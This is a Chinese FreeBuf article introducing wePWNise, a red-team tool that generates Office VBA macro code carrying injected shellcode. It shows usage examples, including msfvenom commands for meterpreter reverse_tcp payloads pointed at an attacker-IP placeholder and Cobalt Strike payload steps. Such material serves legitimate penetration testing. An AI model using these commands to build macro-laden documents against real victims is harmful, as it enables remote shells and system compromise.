freeBuf
分类
工具 数据安全 安全管理 企业安全 网络安全 Web安全 工控安全 无线安全 系统安全 终端安全
特色
报告 人物 容器安全 极客 标准与合规
wePWNise:一款功能强大的红队Office宏VBA代码生成工具
  • 关注
wePWNise:一款功能强大的红队Office宏VBA代码生成工具
2024-03-13 00:15:35

关于wePWNise

wePWNise是一款功能强大的Office宏VBA代码生成工具,该工具基于纯Python开发,可以帮助广大研究人员生成用于Office宏或模版的VBA代码,并以此来测试目标Office环境、应用程序控制和防护机制的安全性。

wePWNise的设计理念将自动化和集成考虑在内,能够以锁定的环境场景为目标。wePWNise能够枚举目标环境的软件限制策略(SRP)和EMET缓解措施,并支持动态识别要将注入Payload的安全二进制文件。除此之外,wePWNise还集成了现有的开发框架(例如Metasploit、Cobalt Strike),并接受原始格式的任何定制Payload,以供红队研究人员使用。

工具运行流程

工具要求

Python termcolor包

安装命令如下:

pip install termcolor

工具下载

由于该工具基于Python 2开发,因此我们首先需要在本地设备上安装并配置好Python 2.7版本环境。

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/FSecureLABS/wePWNise.git

命令行参数

usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]   

                   [--out <output_file>] [--msgbox] [--msg <window_message>]

 

optional arguments:   

  -h, --help                      显示工具帮助信息和退出   

  -i86 <x86_shellcode>            输入x86原始shellcode   

  -i64 <x64_shellcode>            输入x64原始shellcode   

  --inject64                  注入64位Payload,注入x86时设置为False,默认为True   

  --out <output_file>             输出VBA宏的文件路径  

  --msgbox                        显示消息框以防止自动化分析,默认为True  

  --msg <window_message>          --msgbox设置为True时,需要显示的自定义提示消息

工具使用样例

Metasploit Payload

首先,生成适用于x86和x64架构的原始格式Payload,并确保Metasploit监听器配置正确:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

然后将wePWNise指向生成的Payload,并将输出结果存储至msf_wepwn.txt:

$ wepwnise.py -i86 /payloads/msf86.raw  -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

Cobalt Strike Payload

按照下列路径点击菜单,并在Cobalt Strike中生成原始Payload,然后重复该操作并勾选x64勾选框以生成64位Payload:

Attacks > Packages > Payload Generator

然后将生成的Payload传递给wePWNise并生成VBA代码:

$ wepwnise.py -i86 /payloads/cs86.raw  -i64 /payloads/cs64.raw  --msgbox False --out /payloads/cs_wepwn.txt

自定义Payload

在某些特定场景下,我们可能只能拿到x86 Payload,而wePWNise需要32位和64位两种架构的Payload,为了禁用64位注入功能,我们可以创建一个虚假的64位文件,然后将--inject64参数设置为False:

$ echo "+" > /payloads/dummy64.raw

$ wepwnise.py -i86 /payloads/custom.raw  -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt

类似的,如果你只想要生成64位的Payload,可以创建一个虚假的x86文件,然后通过-i86命令行参数提供给wePWNise。

许可证协议

本项目的开发与发布遵循BSD-3-Clause开源许可证协议。

项目地址

wePWNise:【GitHub传送门

参考资料

https://labs.mwrinfosecurity.com/tools/wepwnise/

https://mwrinfosecurity.com/

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
文章目录
关于wePWNise
    工具运行流程
      工具要求
        工具下载
          命令行参数
            工具使用样例
            • Metasploit Payload
            • Cobalt Strike Payload
            • 自定义Payload
            许可证协议
              项目地址
                参考资料